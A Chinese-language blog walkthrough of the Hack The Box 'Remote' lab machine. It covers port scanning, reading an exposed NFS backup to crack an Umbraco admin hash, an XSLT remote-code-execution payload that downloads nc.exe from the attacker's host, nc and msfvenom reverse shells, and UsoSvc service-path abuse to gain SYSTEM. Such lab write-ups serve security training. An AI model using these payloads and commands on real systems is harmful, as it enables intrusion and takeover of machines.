Hack The Box - Remote

概述

目标主机是一台windows服务器,上面部署了一个web站点,对外开放了21、80、445、2049等,先利用目标机器开放的nfs获取信息,发现共享目录下面有一个日志文件中记录了疑似口令的hash,通过彩虹表获取到明文密码,然后通过获取到的信息得知web网站的CMS是Umbraco,查询版本号发现有一个RCE的漏洞,利用漏洞获取一个反弹shell,进一步发现该账号可以修改UsoSvc服务,进而通过该服务获取提权的反弹shell

信息收集

root@vultr:~# nmap -sV -sC 10.10.10.180
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-26 06:23 UTC
Nmap scan report for 10.10.10.180
Host is up (0.072s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3         2049/udp  nfs
|   100003  2,3,4       2049/tcp  nfs
|   100005  1,2,3       2049/tcp  mountd
|   100005  1,2,3       2049/udp  mountd
|   100021  1,2,3,4     2049/tcp  nlockmgr
|   100021  1,2,3,4     2049/udp  nlockmgr
|   100024  1           2049/tcp  status
|_  100024  1           2049/udp  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3m53s, deviation: 0s, median: 3m53s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-05-26 06:28:48
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.42 seconds

从扫描结果看到目标主机开放了nfs服务,nfs工具查看目标目录并挂载到本机

apt install nfs-common

root@vultr:~# showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
root@vultr:~# mount -t nfs 10.10.10.180:/site_backups /htb
root@vultr:~# ls -l /htb
total 115
drwx------ 2 nobody 4294967294    64 Feb 20 17:16 App_Browsers
drwx------ 2 nobody 4294967294  4096 Feb 20 17:17 App_Data
drwx------ 2 nobody 4294967294  4096 Feb 20 17:16 App_Plugins
drwx------ 2 nobody 4294967294  8192 Feb 20 17:16 Config
-rwx------ 1 nobody 4294967294    89 Nov  1  2018 Global.asax
drwx------ 2 nobody 4294967294  4096 Feb 20 17:16 Media
drwx------ 2 nobody 4294967294  8192 Feb 20 17:16 Umbraco
drwx------ 2 nobody 4294967294  4096 Feb 20 17:16 Umbraco_Client
drwx------ 2 nobody 4294967294  4096 Feb 20 17:16 Views
-rwx------ 1 nobody 4294967294 28539 Feb 20 05:57 Web.config
drwx------ 2 nobody 4294967294    64 Feb 20 17:16 aspnet_client
drwx------ 2 nobody 4294967294 49152 Feb 20 17:16 bin
drwx------ 2 nobody 4294967294    64 Feb 20 17:16 css
-rwx------ 1 nobody 4294967294   152 Nov  1  2018 default.aspx
drwx------ 2 nobody 4294967294    64 Feb 20 17:16 scripts

通过一番查看,最终在App_Data下面的Umbraco.sdf里面找到疑似admin账号和口令

root@vultr:/htb/App_Data# strings Umbraco.sdf |grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f

从上面的信息看b8be16afba8c314ad33d812f22a04991b90e2aaa应该是sha1,随便找个sha1破解的网站查一下,发现原始信息就是baconandcheese,简单验证一下发现这个账号应该是一个应用账号,没法直接登录OS
从获取到的信息可以知道,目标机器使用的CMS是Umbraco,google一下发现一个Umbraco RCE漏洞的PoC,修改里面的Payload,先把nc.exe下载过去

payload = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="csharp_user">
public string xml()
{ string cmd = "/c certutil -urlcache -split -f http://10.10.14.94/nc.exe c:/windows/temp/nc.exe"; System.Diagnostics.Process proc = new System.Diagnostics.Process();
 proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd;
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; 
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output;Console.WriteLine(output); } 
 </msxsl:script>
<xsl:template match="/">
<xsl:value-of select="csharp_user:xml()"/>
 </xsl:template> 
</xsl:stylesheet> """;

执行,nc成功下载到目标机器

root@vultr:~# python3 umb.py
Start
[]
<div id="result"><?xml version="1.0" encoding="utf-16"?>****  Online  ****
  0000  ...
  8eb0
CertUtil: -URLCache command completed successfully.
</div>
End

然后在本机开启nc监听4444端口准备接收反弹shell

nc -lvnp 4444

接下来修改payload,让目标机器执行nc启动反弹shell,修改payload中的命令部分,再次执行

/c c:/windows/temp/nc.exe 10.10.14.94 4444 -e cmd.exe

获取到反弹shell

root@vultr:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.94] from (UNKNOWN) [10.10.10.180] 49767
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>

权限提升

收集目标主机信息,这里使用PowerUp.ps1

c:\Users\Public>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Public> . ./PowerUp.ps1
. ./PowerUp.ps1
PS C:\Users\Public> invoke-allchecks
invoke-allchecks

[*] Running Invoke-AllChecks


[*] Checking if user is in a local group with administrative privileges...


[*] Checking for unquoted service paths...


[*] Checking service executable and argument permissions...


[*] Checking service permissions...


ServiceName   : UsoSvc
Path          :  C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True

看到返回信息提示我们可以利用UsoSvc的漏洞,这个通过这种方式我们可以让UsoSvc服务加载任意可执行程序,进而达成反弹shell的目的。
先尝试Invoke-ServiceAbuse -Name 'UsoSvc' -Command "c:\windows\temp\nc.exe -e cmd.exe 10.10.14.94 2222"不知道为啥不起作用,于是还是用msfvenom制作一个payload

sfvenom -p windows/shell_reverse_tcp lhost=10.10.14.94 lport=2222 -f exe >re.exe

本地先起一个nc监听2222端口,准备接收反弹shell,然后把re.exe上传到目标主机,然后在目标机器上修改usosvc配置,并重启服务

c:\Users\Public>sc config usosvc binpath="c:\windows\temp\re.exe"
sc config usosvc binpath="c:\windows\temp\re.exe"
[SC] ChangeServiceConfig SUCCESS

c:\Users\Public>sc stop usosvc
sc stop usosvc
[SC] ControlService FAILED 1062:

The service has not been started.


c:\Users\Public>sc start usosvc
sc start usosvc

此时本机接收到反弹shell

root@vultr:~# nc -lvnp 2222
listening on [any] 2222 ...
connect to [10.10.14.94] from (UNKNOWN) [10.10.10.180] 49779
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>dir c:\users\administrator\desktop
dir c:\users\administrator\desktop
 Volume in drive C has no label.
 Volume Serial Number is BE23-EB3E

 Directory of c:\users\administrator\desktop

02/20/2020  03:41 AM    <DIR>          .
02/20/2020  03:41 AM    <DIR>          ..
05/26/2020  12:38 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  19,239,432,192 bytes free

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 206,723评论 6 481
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 88,485评论 2 382
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 152,998评论 0 344
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 55,323评论 1 279
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 64,355评论 5 374
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,079评论 1 285
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,389评论 3 400
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,019评论 0 259
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 43,519评论 1 300
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,971评论 2 325
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,100评论 1 333
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,738评论 4 324
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,293评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,289评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,517评论 1 262
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,547评论 2 354
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,834评论 2 345

推荐阅读更多精彩内容